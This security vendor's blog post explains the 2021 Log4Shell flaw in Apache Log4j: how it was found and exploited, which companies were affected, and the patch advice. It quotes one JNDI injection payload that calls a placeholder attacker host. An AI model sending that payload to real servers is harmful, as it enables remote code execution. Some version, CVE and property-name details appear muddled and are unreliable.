Log4Shell hits big players with critical 0-day exploit
[Last updated Dec. 19, 2021]
A recently discovered Log4j vulnerability (Log4Shell, CVE-2021-44228) in the Apache utility that allows unauthenticated remote code execution (RCE) and server take over is said to be exploited in the wild. Due to how widely used the Apache tool is, affecting companies such as Amazon, Apple, Cisco, Steam, Tesla, Twitter, and many more, the issue is of global scale. A patch is already available and other solutions are being made accessible.
Find CYREBRO’s latest mitigation steps:
Log4j 2.15.0 vulnerability – Initial vulnerability
Log4j 2.16.0 vulnerability – DoS vulnerability
Log4j 2.17.0 vulnerability – RCE vulnerability
What happened?
A vulnerability, said to be first discovered as early as December 1 and exploited initially on Minecraft, has been found in Log4j, a Java logging library. This vulnerability allows network lookups, enabling even an inexperienced attacker to inject arbitrary code from an unauthorized domain onto a vulnerable server, taking over it. Log4j versions 2.0 -2.17.0 are vulnerable and have been given the highest CVSS 3.0 score – 10 out of 10.
How did it happen?
The vulnerability started off as a joke on Minecraft servers, where players can send a message in the chat containing a specific string of code ${jndi:ldap://attacker.com/a} and effectively take over a Minecraft server or client. Due to the simplicity of this exploitation, attackers have been quick to take advantage of it once the vulnerability went public on Dec. 9.
What are the effects?
Researchers have reported the vulnerability is used to install crypto mining malware, botnets, execute denial of service attacks and leak sensitive data from vulnerable servers. The vulnerability is affecting services around the globe like Apple, Tencent, Steam, Twitter, Baidu, DIDI, JD, NetEase, CloudFlare, Amazon, Tesla, Google, Webex, LinkedIn and more. The risk this vulnerability poses demands fast and great attention from all affected organizations to minimize potential damage. Unfortunately, the remaining month of December will be a cleanup nightmare for already overworked IT managers coming into a new year. Still, not enough is known and more is being learned on the matter, many companies have yet to release a statement addressing the issue.
What is being done about it?
For starters, Apache requested all Log4j versions to be updated to the 2.17.1 version where the vulnerability, tracked as CVE-2021-45046, is fixed. Additionally, organizations should evaluate what other versions demand attention as the Log4j vulnerability continues to be exploited. The workaround initially presented of setting the “Log4j2.noFormatMsgLookup” system property to “True”, does not mitigate the issue as previously thought and given as a solution.
Additionally, different software vendors and cybersecurity companies are also tackling this issue by presenting solutions of their own on how to deal with the vulnerability. This subject is being made public through national and organizational announcements and discussed widely in order to reach the many users of the tool around the world that could be affected by the vulnerability.
What measures are being taken to prevent this in the future?
The truth of the matter is that not much can be done to prevent such vulnerabilities in the future. Bugs and flaws similar to this one will always exist and forever continue to disrupt the IT world. Quick updates and help are being offered to all affected organizations.
The smallest and most simple vulnerabilities can cause massive amounts of damage, financial loss, and IT worker fatigue. As pointed out in a recent CYREBRO report, the most common threat vector we found from 2021 is the vulnerability exploit. It is imperative for organizations to treat these incidents with full attention as every second a vulnerability isn’t dealt with can cause colossal implications. This incident can be seen as a quick reminder as to how critical it is to maintain and keep up with company-relevant software patches and updates.
Avoiding such cases is near impossible but being able to respond swiftly and mitigate threats before significant damage is done is completely achievable. If your organization is consistent in IT maintenance, auditing, and updating accordingly, response time becomes faster and simpler, keeping organizations safer and smarter.